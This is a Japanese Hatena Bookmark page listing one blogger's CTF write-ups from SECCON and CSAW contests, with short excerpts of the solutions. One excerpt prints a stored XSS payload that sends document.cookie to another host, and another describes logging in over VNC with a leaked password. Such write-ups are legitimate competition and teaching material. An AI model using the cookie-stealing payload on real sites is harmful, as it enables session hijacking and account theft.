タグ

ブックマーク / kusano-k.hatenadiary.com (5)

  • SECCON 2014 オンライン予選(日本語) Write-up - kusano-k’s blog

    ぼっチームsuperflipは1403点、24位だった。 練習問題 練習問題 100点 FLAG{seccon2014} このパケットを解析せよ ネットワーク 100点 FTP通信。FTPは制御とファイル転送は別のポートで行う。55番目のパケットに、 RkxBR3tGN1AgMTUgTjA3IDUzQ1VSM30=というファイルがあり、Base64デコードすると、 FLAG{F7P 15 N07 53CUR3} ソーシャルハック ネットワーク 300点 今流行のLINE乗っ取り。こちらの用意したサイトにアクセスさせると、 MyVNCpasswordIsVNCpass123というリファラが付いているので、接続元にVNCで接続すれば良い。 FLAG{giveMeYourWebM0n3y} decode me 暗号 100点 EUCの中国語ファイル。ROT13にすると英語部分が SECCON 2

    SECCON 2014 オンライン予選(日本語) Write-up - kusano-k’s blog

  • SECCON 2013 全国大会 Write-up - kusano-k’s blog

    2013「年度」の全国大会。私が所属していた某チームは、半分より下の順位だった(´・ω・`) 塔の名前が付いた6個のサーバーがあって、サーバーの中からキーワードを探し出すと点数ゲット、指定されたファイルにチームごとの文字列が書き込まれていると点数ゲット、という形式。解けた問題の解法。焦っていたので、キーワードとか解いている途中の様子とかをちゃんとメモしていなかった。問題サーバーのVMイメージが貰えたら、残りの問題も解いてみよう。 Korin 元ネタ: カリンの塔 1個目 管理者宛のメールフォーム。管理者向けページへの隠しリンクがあるが、アクセスできない。メールアドレスがきっちりチェックされていると思いきや、ローカル部(@の前)には何でも書ける。 "><script>location="http://192.168.1.3/?"+document.cookie</script>@aaa.bb

    SECCON 2013 全国大会 Write-up - kusano-k’s blog
    tukanana
    tukanana 2014/03/03
    リンク

  • CSAW 2013 Qualification Round Write-up - kusano-k’s blog

    CSAW 2013 Qualificationにチームsuperflipとして参加した。メンバーは私1人。3400点、109位。去年も参加したけど良問が多くて面白い。 私が解いた問題の解法。解けなかった問題は、他の人のWrite-upへのリンク。 Trivia Trivia1 - 50 Points Drink all the booze, ____ all the things!ググるだけ。というか、ググろうとChromeのOmniboxに問題文を貼り付けたら、候補に答えが表示されたw hack Trivia2 - 50 Points What is the abbreviation of the research published in the Hackin9 issue on nmap by Jon Oberheide, Nico Waisman, Matthieu Suiche,

    CSAW 2013 Qualification Round Write-up - kusano-k’s blog
    tukanana
    tukanana 2013/09/24
    リンク

  • SECCON 2013 横浜大会 Write-up - kusano-k’s blog

    SECCON 2013 横浜大会に参加してきた。1564点で1位。誰も解けなかった3問以外は全部解いた(・∀・) 以下、私(と周囲の人)の解法。後で問題が公開されるという噂もあるので、自力で解きたい人は見ない方が良い。 1. 練習問題(タイトルを忘れた)(バイナリ、10点) コピペ。 答え: seccon 2. SSBNewCommer(バイナリ、200点) Androidのアプリを解析する問題。 クリックするとそのマス目の色が変わり、特定の配置になるとFLAGが表示される(らしい)。プログラムは、 x = マスの配置を文字列に変換 if (x[0]=='B' && x[4]=='I' && sha1(x)=='50e878fe75ee49b31e68d85ffd54fc7e3a2605c') dialog('Flag:'+x)こんな感じ。探索するプログラムを書いて終わりかと思いきや、答え

    SECCON 2013 横浜大会 Write-up - kusano-k’s blog
    tukanana
    tukanana 2013/08/25
    横浜大会優勝のドワンゴのkusanoさんのWrite-UP。
    リンク

  • kusano_kの日記

    CSAW CTF 2014の予選にsuperflipというチーム名で参加した。結果。2240点145位。去年までは簡単な問題が多かったけど、今年は難しい問題は普通に難しかった。以下、解けた問題の解法。問題はアカウントを登録すれば、ここでまだ見られる。 Exploitation bo (100点) バイナリファイルとそれが動いているサーバーのIPアドレスが提示される良くある形式。普通はバイナリファイル中にフラグは無いので、バイナリファイルを解析して、その結果をサーバーに投げるけれども、この問題はバイナリファイル中にフラグがそのまま含まれていた。 >strings bo : Welcome to CSAW CTF! Time to break out IDA Demo and see what's going on inside me. :] flag{exploitation_is_easy

    kusano_kの日記
    tukanana
    tukanana 2013/06/20
    リンク
  • 1

お知らせ

もっと読む

公式Twitter

  • @HatenaBookmark

    リリース、障害情報などのサービスのお知らせ

  • @hatebu

    最新の人気エントリーの配信

はてなブックマーク

公式Twitter

はてなのサービス

  • App Storeからダウンロード
  • Google Playで手に入れよう
Copyright © 2005-2024 Hatena. All Rights Reserved.